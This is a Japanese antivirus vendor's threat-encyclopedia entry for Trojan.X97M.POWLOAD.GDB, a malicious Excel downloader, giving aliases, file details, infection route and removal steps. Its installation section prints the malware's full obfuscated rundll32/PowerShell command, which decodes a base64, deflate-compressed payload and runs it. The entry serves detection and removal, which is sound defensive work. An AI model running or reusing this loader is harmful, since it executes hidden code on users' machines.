更新者 : Paul Steven Nadera
 別名:

TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); RDN/Generic Downloader.x (NAI); VBA/TrojanDownloader.Agent.SFS trojan (NOD32)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 59,904 bytes
タイプ XLS
メモリ常駐 なし
発見日 2020年5月12日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • RuNdLl32 SHELL32.DLL,ShellExec_RunDLL "POWERshELl" " . ( ([stRIng]$vErboSEpREFErence)[1,3]+'x'-JoIn'') (&('NEW-Obj'+'e'+'ct') SysTeM.iO.comPreSsIOn.dEFlaTEStrEam( [SyStEm.iO.MEMORYstREAM][SyStEm.CoNvErT]::FroMbAse64sTriNG( ('ZVdrd+JIDv0rHp9sl1kSN5B0z0w4O'+'buEGGJeZoCQ9DCcI8cUUNjYtDEkGbb++0hl88p+wDZGjytdSSUudi+waMXyThslHytrbOi7otxdy11J7gpS166mLPjBLlnPqgVWFR/48hWvie2Eptvvs1x'+'Z074YrL9lOU1D5YJEfVL'+'TWLuIgjP1fjT4seJk+0YqiaK'+'y/13uf'+'pO7b3L3K77C17/L1Ld+VWMfqGvhp4+'+'fTmInhGGNn8EPc0U/eXiJRccTeN/0bLyab3ZnEr2txQS/rCotUhhYSxMBIASEqWkmIigpJ1loSxS'+'6shNOstYgC+EggQIf1'+'zdd/NGu3'+'Af8Fh+GlR5KGZirro'+'rnWsnuc1VjdZR5SUzeIXzOxO4QZIvlcgqAeUgQml5TeAlZ0x09r3'+'+/1/FRscAzFlIIAxTzos6Wk2eNDF3s/oDHal1qRFqW2H3ea0xElIyaCDjL4v6SmivtLV'+'LUfSvZx45u'+'2bbC8q'+'xnV17xRpHmWb'+'tw3cXb70SsoWmjwUfXOuIiR3xmvVNlYHTli91PX94V8f7A5V0B72Iu7wxzr4DOVcIjj3Jd58lVN6akr9H6lT3BkFYgJjJn6m2oiA4oLp/nUAknLa6juWQj70a9TZiIJT'+'ftMOFxtOrzeCs8vjYf3XAS8B6fjlHyEZ7l'+'3Zd9SjLHGuvwNwrYwcvrgnuU+IvdYCM1A7GDLy8vdvZcUiRLW'+'95llbInS0NFKnuleKl'+'skTq'+'CMkqo+GChomFoxme3VC92BTXuqRzTVL8vMK0typqpbysQ'+'bLh+e5u2xrU8y5bG5l1VI5fMjRPhBh13Sel7pqJvRe6E'+'5TAV28jnxinDS'+'jOVC6kh7kkfE40OP4mxVcoGORl8nFlDKDeqNwuqT4uqVUvUqiodLmXBTcRW6c7x0u6be2jhdcl8Cqlbp/RzNKHHNicEKtLCfsCkjUAt3o1IhhjiiYJ9BHOx'+'m8Mb0dMWMs01Xid4LRYK6ef7t2KJiGtBE1rRG9adfsIcVfvXxA0ZiQTQbPYjl'+'ED22lCcyT2g0n72qOxRGyfVTRxzRRuGlBwBEXG'+'bPlixbupDqBCBaHkG9VoUHH0ThxjcPE'+'lW69uvhEEZSzbIRB6x+gE4b9I87XRBTK9XwdEV+8pyI6zPphznmelFTGlC4DzLPPsPfQuaPqwdWTZx'+'Bgs1TA6hZFanRP9rQM6Hbkz8IByq3tlsCohYqVKXF7XDgD7QQ0XCE/OZv2aFGAge4o1Ogg5'+'mlEa/nbrd+8wCfz36w4FSLREKEjRP'+'8'+'p11JjGP/ZU1F0+lWD3FdDV0c6mfoWof7xD'+'k'+'YZJGbwQpwIZ4cBOqzAfFtYBODWpEtjGqzt14NB4bZxN46KpDRCWHTCPIHPlDRp0Qm8X48rlfjnnEqzjgIR2qCjscOtDk+kEz4/VEjVSmWe+34InrudxVIxIhU5Dfq1V4xPFzseOd4S0MgC+7'+'Et83bQFPsGjgjMV+eEjnW/HY7ZTlmadYfQfPexTy'+'f+anQpzhzI1xTlJD4mepMIRQWVpoIuarwPW4pptYABdUzkuo9AaCkLxA1SNQefYXFZwPQmwWsPDxhclQ8glqDyQnOlPK9ueRr7G1KuvNq0p2ODvt7Ilq5j98NXe7OOFFmIwvdhsy+W/sbXzrQFS38Kg7c3CyZcScGj'+'zCQXRi9wG4MtxUhifNRh'+'NsqL1EhNNxYMaldoWNhg33CyufGVRLhhukRXYcIiter'+'ewr+GxD0BhV9ja+puj4bK1o'+'rLgeddZdWu2npfooggcqHVxMVBcpc9fywBSmX6G4D7L95/aDLG8rPUHFissIbjNZ7Vh4buhPCdR+08vTTeglIgq1HljtJWbA3crcDk+oZ'+'APL/h5J4Th1NTakeO4DS50u4nwPSX1Aa2OlZ1Maws3JjGT37ppq+qafIKn4UIujp'+'dr3Ltn3UypcGCIJMU82'+'cUgn7gCelmspy9Mo5q43R4lezwLbaUpNkMAEmg1f1F4ciYNvwuVYhdGswqL50mn+Ce/Qnqzl3X8NSnTDhrYTQeATsapq/r/8iLdBRAOAKI'+'rdk3OOTMSYMQGRn575xzroqV0X24QQgoJIZYqwDWoCuwH1RZ3c4sJDK5lvw2LWmGFhBYmWmrXRqqlXHXgKBzrJNO3GDFAmn0+DAq/RfIEO+H+/U1BaHhc6D4GOjdH9R8KxE3oxmgFMzoi0F1Bv1OV'+'Yu3p9j+K9SAME5gBToEQAcaGHf+F70QYHnBZh8Jwn6Az0cU7SNOHAoefYfoPgR9hfHEV6+FINAZxexILf8LOeGRXGef0XPYcN5bpVKmxTn/FBfwA9EJ2ZjuID8IkgeAn9P1/ak77Eka0Z5udtaIs5rcRCLUTpemroPx+x6LyZntV1kNb1KYtEYsJJ6Tk9TgKKfH1aZG03hoEtL8/mrqb4UwuqoYLuRUB'+'Bn427UqGAAw83k7KYGsb5cXwcqriU9hJB6'+'2kAvAOzwVzPeO5im/'+'F3kcjy2UjGM4+v1F8WPMMK5U8zS61d1YqaJuzreu8ixhDK5vlkz'+'8zQQCp+oxr6OYdqtracZYiq+5lGC6YqCFoi/JQhmueYIdzlzc+q'+'9O+JjofqI+2VD3aCw4m4oQMyz2L880Mbq/pXs'+'Dz5V0CE4f7T2i+w'+'56c6'+'4VHLPuX6FAmuYP46kpfsLzqL8'+'Bj6Bw==')),[Io.coMpReSSION.COMpReSSIOnmOdE]::DecOmPREsS )| &('f'+'ore'+'Ach'){ &('N'+'E'+'W-'+'Object') SYSTeM.io.sTREAMreADer($_ ,[TeXt.eNcODinG]::Ascii ) }).readTOeND()"

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.794.08
初回 VSAPI パターンリリース日 2020年4月9日
VSAPI OPR パターンバージョン 15.795.00
VSAPI OPR パターンリリース日 2020年4月10日

手順 1

Windows XP、Windows Vista 、Windows 7、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.X97M.POWLOAD.GDB」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください